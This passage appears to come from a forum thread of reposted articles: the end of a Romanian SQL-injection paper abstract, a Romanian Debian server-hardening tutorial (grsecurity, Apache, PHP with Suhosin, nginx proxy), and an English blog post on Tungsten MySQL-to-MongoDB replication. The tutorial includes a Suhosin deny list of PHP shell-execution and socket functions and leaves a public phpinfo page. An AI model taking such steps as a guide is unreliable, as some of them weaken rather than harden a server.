toate datele ce parvin de la utilizatori. În aceasta categorie intra parametrii GET, POST si chiar cookie. Aspectele reflectate în aceasta lucrare desigur nu acopera în întregime tema atacurilor SQL injection. Fiecare SGBD are nuantele sale pe care raufacatorul potential poate sa le foloseasca spre binele sau. Tema lucrarii date este derivata din tema proiectului de masterat întitulata „Metode si solutii de detectare a web-atacurilor”. Source: http://www.ase.md/~osa/publ/ro/pubro32/
  24. Acest tutorial este adresat celor care doresc sa isi configureze un server cu Debian. O sa acopar in in el urmatoarele aspecte: 1. Instalare kernel cu grsec. 2. Instalare si configurare apache. 3. Instalare si configurare php. 4. Instalare si module php (extensii). 5. Configurare suhosin. 6. Instalare MySQL Server. 7. Modificari diverse permisiuni pentru un nivel mai bun de securitate 8. Instalare nginx si folosirea lui ca frontend pentru apache (dual strat web server) ---------------- 1. Instalare kernel cu grsec. Daca nu stiti inca ce este grsec/grsecurity, un bun punct de plecare este Grsecurity. Pentru linux, grsecurity este un fel de "sfantul graal" in materie de securitate. In plus, va scapa de o problema ce o are linux si care pe mine ma irita: ps aux dupa user, arata toate procesele. root@tex:~# echo "deb http://debian.cr0.org/repo/ kernel-security/" >> /etc/apt/sources.list root@tex:~# wget http://kernelsec.cr0.org/kernel-security.asc root@tex:~# apt-key add kernel-security.asc OK root@tex:~# apt-get update root@tex:~# apt-cache search grsec linux-source-2.6.32.15-1-grsec - Linux kernel source for version 2.6.32.15-1-grsec linux-source-2.6.25.10-1-grsec - Linux kernel source for version 2.6.25.10-1-grsec linux-image-2.6.32.15-1-grsec - Linux kernel binary image for version 2.6.32.15-1-grsec linux-headers-2.6.32.15-1-grsec - Header files related to Linux kernel, specifically, linux-source-2.6.27.29-4-grsec - Linux kernel source for version 2.6.27.29-4-grsec root@tex:~# apt-get install linux-image-2.6.32.15-1-grsec linux-headers-2.6.32.15-1-grsec root@tex:~# init 6 # aici dam reboot pentru a boota noul kernel. // Dupa reboot root@tex:~# uname -a Linux tex 2.6.32.15-1-grsec #2 SMP Mon Jun 28 09:05:30 CEST 2010 x86_64 GNU/Linux root@tex:~# su - tex tex@tex:~$ ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND tex 2103 0.6 0.1 36908 1276 pts/0 S 00:58 0:00 su - tex tex 2104 13.0 0.6 23380 6200 pts/0 S 00:58 0:00 -su tex 2129 0.0 0.1 16332 1176 pts/0 R+ 00:58 0:00 ps aux Din cate observati, vad doar procesele mele dupa user. 2. Instalare si configurare apache. root@tex:~# apt-get install apache2-mpm-prefork apache2.2-common apache2.2-bin root@tex:~# rm /etc/apache2/sites-available/default root@tex:~# cat >> /etc/apache2/sites-available/default << EOF > NameVirtualHost * > > <Directory "/var/www"> > AllowOverride AuthConfig FileInfo Options Indexes Limit > Options FollowSymLinks > Options -Indexes > </Directory> > > <VirtualHost *> > DocumentRoot /var/www > ServerName 10.0.0.220 > CustomLog /var/log/apache2/access_log combined > ErrorLog /var/log/apache2/error_log > </VirtualHost> > EOF root@tex:~# Apache o sa-l listam pe 127.0.0.1 port 81 si o sa fie backend. root@tex:~# echo "Listen 127.0.0.1:81" > /etc/apache2/ports.conf root@tex:~# /etc/init.d/apache2 start 3. Instalare si configurare php (plus libapache2-mod-php5, necesar la apache (mod php)) PHP-ul o sa-l instalez de la dotdeb. root@tex:~# echo "deb http://packages.dotdeb.org stable all" >> /etc/apt/sources.list root@tex:~# echo "deb-src http://packages.dotdeb.org stable all" >> /etc/apt/sources.list root@tex:~# wget http://www.dotdeb.org/dotdeb.gpg root@tex:~# cat dotdeb.gpg |apt-key add - && rm dotdeb.gpg OK root@tex:~# apt-get update root@tex:~# apt-get install php5 php5-cli libapache2-mod-php5 php5-common php5-suhosin Inlocuiesc "expose_php = On" cu "expose_php = Off" / "short_open_tag = Off" cu "short_open_tag = On" si "session.name = PHPSESSID" cu "session.name = SERVLET" in php.ini pentru apache2. root@tex:~# perl -pi -e 's/expose_php = On/expose_php = Off/' /etc/php5/apache2/php.ini root@tex:~# perl -pi -e 's/short_open_tag = Off/short_open_tag = On/' /etc/php5/apache2/php.ini root@tex:~# perl -pi -e 's/PHPSESSID/SERVLET/' /etc/php5/apache2/php.ini 4. Instalare si configurare module php (extensii). O sa instalez urmatoarele extensii php: curl, gd, mcrypt, mysql. root@tex:~# apt-get install php5-curl php5-gd php5-mcrypt php5-mysql 5. Configurare suhosin. Din motive de securitate, o sa adaug in blacklisted utilizand suhosin urmatoarele functii: exec,shell_exec,passthru,show_source,dl,leak,ini_alter,ini_restore,proc_open,proc_nice,proc_terminate,proc_close,proc_get_status,symlink,system,popen,pcntl_getpriority,pcntl_wait,diskfreespace,disk_free_space,disk_total_space,get_current_user,stream_socket_accept,stream_socket_client,stream_socket_get_name,stream_socket_recvfrom,stream_socket_sendto,stream_socket_server,stream_socket_shutdown root@tex:~# cat >> /etc/php5/conf.d/suhosin.ini << EOF > > suhosin.executor.func.blacklist = "exec,shell_exec,passthru,show_source,dl,leak,ini_alter,ini_restore,proc_open,proc_nice,proc_terminate,proc_close,proc_get_status,symlink,system,popen,pcntl_getpriority,pcntl_wait,diskfreespace,disk_free_space,disk_total_space,get_current_user,stream_socket_accept,stream_socket_client,stream_socket_get_name,stream_socket_recvfrom,stream_socket_sendto,stream_socket_server,stream_socket_shutdown" > suhosin.cookie.max_array_depth = 256 > suhosin.cookie.max_array_index_length = 256 > suhosin.cookie.max_name_length = 256 > suhosin.cookie.max_totalname_length = 512 > suhosin.cookie.max_value_length = 20000 > suhosin.cookie.max_vars = 200 > suhosin.get.max_array_depth = 200 > suhosin.get.max_totalname_length = 1024 > suhosin.get.max_value_length = 1024 > suhosin.get.max_vars = 1024 > > > suhosin.post.max_array_depth = 1024 > suhosin.post.max_array_index_length = 1024 > suhosin.post.max_name_length = 1024 > suhosin.post.max_totalname_length = 1024 > suhosin.post.max_value_length = 95000 > suhosin.post.max_vars = 1024 > > suhosin.request.max_vars = 512 > suhosin.request.max_value_length = 90000 > suhosin.request.max_totalname_length = 1024 > suhosin.upload.max_uploads = 400 > > suhosin.executor.include.max_traversal = 2 > > EOF root@tex:~# Cam asa arata php in cli: root@tex:~# php -v PHP 5.3.8-1~dotdeb.2 with Suhosin-Patch (cli) (built: Aug 25 2011 13:30:46) Copyright (c) 1997-2011 The PHP Group Zend Engine v2.3.0, Copyright (c) 1998-2011 Zend Technologies with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH root@tex:~# 6. Instalare MySQL Server si MySQL Client root@tex:~# apt-get install mysql-client-5.5 mysql-server-5.5 7. Modificari diverse permisiuni pentru un nivel mai bun de securitate Mountam tmpfs in /tmp cu flag-urile "noexec,nosuid,nodev" din motive de securitate. root@tex:~# echo "tmpfs /tmp tmpfs noexec,nosuid,nodev 2 2" >> /etc/fstab root@tex:~# mount /tmp root@tex:~# mount |grep "/tmp" tmpfs on /tmp type tmpfs (rw,noexec,nosuid,nodev) Stergem "/var/tmp" si il facem simlink catre tmp. root@tex:~# rm -rf /var/tmp/ && ln -s /tmp /var/tmp Dam chmod 640 la "/dev/shm" din motive de securitate. root@tex:~# chmod 640 /dev/shm 8. Instalare nginx si folosirea lui ca frontend pentru apache (dual strat web server) O sa listam port 80 cu nginx si o sa-l folosim ca frontend pentru apache, care se listeaza pe 127.0.0.1 port 81. (reverse proxy) root@tex:~# apt-get install nginx root@tex:~# rm /etc/nginx/sites-enabled/default root@tex:~# pico /etc/nginx/sites-enabled/default # fisier configuratie server { listen 0.0.0.0:80 default; server_name _; access_log off; error_log /dev/null; location / { proxy_pass http://127.0.0.1:81; proxy_redirect off; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; } } Pornim nginx-ul. root@tex:~# /etc/init.d/nginx start Starting nginx: nginx. root@tex:~# [URL="http://i42.tinypic.com/121zmtx.png"]O sa pun un phpinfo in "/var/www/"[/URL] pentru a vedea daca este totul in ordine si o sa sterg index.html (default) root@tex:~# echo "<?php phpinfo(); ?>" >> /var/www/index.php root@tex:~# rm /var/www/index.html // restart la apache. root@tex:~# /etc/init.d/apache2 restart --------- Note: - Daca aveti intrebari legate de acest tutorial, va raspund cu cea mai mare placere. - Imi cer scuze pentru eventualele greseli legate de exprimare (am cam tras chiulul de la somn) - Nu am specificat sursa acestui tutorial pentru ca este facut de mine.
  25. The last article on this blog described our planned MySQL to MongoDB replication hackathon at the recent Open DB Camp in Sardinia. Well, it worked, and the code is now checked into the Tungsten Replicator project. This article describes exactly what we did to write the code and set up replication. You can view it as a kind of cookbook both for implementing new database types in Tungsten as well as setting up replication to MongoDB. The Team MySQL to MongoDB replication was a group effort with three people: Flavio Percoco, Stephane Giron, and me. Flavio has worked on MongoDB for a couple of years and is extremely well-informed both on database setup as well as application design. Stephane Giron is a replication engineer at Continuent and has done a substantial amount of the work on data extraction from MySQL, especially row replication. I work on the core execution framework as well as performance. Getting Started with MongoDB There were a couple of talks on MongoDB during the first morning of Open DB camp (Saturday May 7th), which Stephane and I dutifully attended to raise our consciousness. We got cracking on implementation around 2pm that afternoon. The first step was to bring up MongoDB 1.8.1 and study its habits with help from Flavio. MongoDB is definitely easy to set up. You get binary builds from the MongoDB download page. Here is a minimal set of commands to unpack MongoDB 1.8.1 and start the mongod using directory data to hold tables. $ tar -xvzf mongodb-osx-x86_64-1.8.1.tgz $ cd mongodb-osx-x86_64-1.8.1 $ mkdir data $ bin/mongo --dbpath data (... messages ...) You connect to mongod using the mongo client. Here's an example of connecting and creating a table with a single row. This is schema-less programming in action. You just insert BSON documents (BSON = Binary JSON) into collections, which is Mongolese for tables. MongoDB creates the collection for you as soon as you put something in it. The automatic materialization is quite addictive once you get used to it, which takes about 5 minutes. The MongoDB client language is really handy. It is based on JavaScript. There are what seem to be some non-Javascript commands like "show dbs" to show databases or "show collections" to list the tables. Everything else is object-oriented and easy to understand. For example, to find all the records in collection test, as we saw above, you just connect to the database and issue a command on the local db object. Collections appear as properties of db, and operations on the collection are methods. It helps that the MongoDB folks provide very accessible documentation, for example a SQL to MongoDB translation chart. I put together a little practice program using the MongoDB Java driver to insert, referring to the Javadoc for the class library when in doubt about API calls. There are also a couple of very helpful examples, like this one, included with the driver. All told, setup and orientation took us about 45 minutes. It helped enormously that Flavio is a MongoDB expert, which minimized flail considerably. Implementing Basic Replication from MySQL to MongoDB After setup we proceeded to implement replication. Here is an overview of the replicator pipeline to move data from MySQL to MongoDB. Pipelines are message processing flows within the replicator. Direct pipelines move data from DBMS to another within a single replicator. They are already a standard part of Tungsten Replicator and most of the code shown above already exists, except for the parts shown in red. Before we started, we therefore needed to set up a replicator with a direct pipeline. We first built the code according to the instructions on the Tungsten project wiki, uploaded the binary to our test host, and configured the replicator. First, we ran the Tungsten configure script to set defaults for the MySQL server (user name, extract method, etc.). Next we ran the configure-service command to set up the direct pipeline configuration file. Both commands together look like the following: ./configure ./configure-service -C --role=direct mongodb The second command created a file called tungsten-replicator/conf/static-mongodb.properties with all the information about the direct pipeline implementation but of course nothing yet about MongoDB. Now we could start the implementation. To move data to MongoDB, we needed two new components: A Tungsten RawApplier to apply row updates to MongoDB. RawApplier is the basic interface you implement to create an applier to a database. A Tungsten Filter to stick column names on row updates after extracting from MySQL. MySQL row replication does not do this automatically, which makes it difficult to construct JSON at the other end because you do not have the right property names. To get started on the applier I implemented a very simple class named MongoApplier that could take an insert from MySQL, turn it into a BSON document, and add it to an equivalently named database and collection in MongoDB. I added this to the replicator code tree, then built and uploaded tungsten-replicator.jar. (Use 'ant dist' in the replicator directory to build the JAR.) To start using the new MongoDB applier, we needed to edit the service properties file to use this component instead of the standard MySQL applier that configuration adds by default. To do this, you can open up static-mongodb.properties with your favorite editor. Add the following properties at the bottom of the APPLIERS section. Next, you need to fix up the direct pipeline so that the last stage uses the new applier. We located the direct pipeline definition (around line 208 in the properties file) and set the applier to mongodb as shown in the following example. We then started the replicator using 'replicator start.' At that point we could do the following on MySQL: mysql> create table foo(id int primary key, msg varchar(35)); Query OK, 0 rows affected (0.05 sec) mysql> insert into foo values(1, 'hello from MySQL!'); Query OK, 1 row affected (0.00 sec) ...And within a second we could see the following over in MongoDB: This kind of progress was very encouraging. It took roughly 2 hours to get to move the first inserts across. Compared to replicating to a new SQL database like Oracle that's lightning fast. However, there were still no property names because we were not adding column names to row updates. Meanwhile, Stephane had finished the column name filter (ColumnNameFilter) and checked it in. I rebuilt and refreshed the replicator code, then edited static-mongodb.properties as follows to add the filter. First put in the filter definition in the FILTERS section: Next, make the first stage of the direct pipeline use the filter: We then restarted the replicator. Thereupon, we started to see inserts like the following, complete with property names: That was better, much better! To this point we had put in exactly 2 hours and 45 minutes wall clock time. It was enough to prove the point and more than enough for a demo the next day. The hackathon was a rousing success. Further Development Over the next couple of days I rounded out the MongoApplier to add support for UPDATE and DELETE operations, as well as to implement restart. The full implementation is now checked in on code.google.com, so you can repeat our experiences by downloading code and building yourself or by grabbing one of the Tungsten nightly builds. Restart is an interesting topic. Tungsten uses a table to store the sequence number of the last transaction it applied. We do this by creating an equivalent collection in MongoDB, which is updated after each commit. There is a problem in that MongoDB does not have transactions. Each update is effectively auto-commit, much like MyISAM table type on MySQL. This means that while Tungsten can restart properly after a clean shutdown, slave replication is not crash safe. Lack of atomic transactions is a bigger issue with MongoDB and other NoSQL databases that goes far beyond replication. For now, this is just how Tungsten's MongoDB support works. Speaking of things that don't work, the current implementation is a prototype only. We have not tested it with more than a few data types. It only works with a single MongoDB daemon. It does not set keys properly or specify indexes on tables. There are no guarantees about performance, except to say that if you had more than a small amount of data it would be quite slow. (OK, that's a guarantee after all.) Epilog Overall all the hackathon was a great success, not to mention lots of fun. It went especially well because we had a relatively small problem and three people (Stephane, Flavio, and Robert) with complementary skills that we could combine easily for a quick solution. That seems to be a recipe for succeeding on future hackathons. From a technical point of view, it helped that MongoDB is schema-less. Unlike SQL databases, just adding a document materializes the table in MongoDB. This made our applier implementation almost trivially easy, because processing row updates takes only a few dozen lines of Java code in total. It also explains why a lot of people are quite attached to the NoSQL programming model. I am looking forward to learning a lot more about MongoDB and other NoSQL databases. It would take two or three weeks of work to get our prototype to work with real applications. Also, it looks as if we can implement replication going from MongoDB to MySQL. According to Flavio there is a way to search the transaction log of MongoDB as a regular collection. By appropriately transforming BSON objects back to SQL tuples, we can offer replication back to MySQL. There are many other lessons about MongoDB and NoSQL in general but it seems best to leave them for a future article when I have more experience and actually know what I'm talking about. Meanwhile, you are welcome to try out our newest Tungsten replication feature. Source: scale-out-blog.blogspot.com
×
×
  • Create New...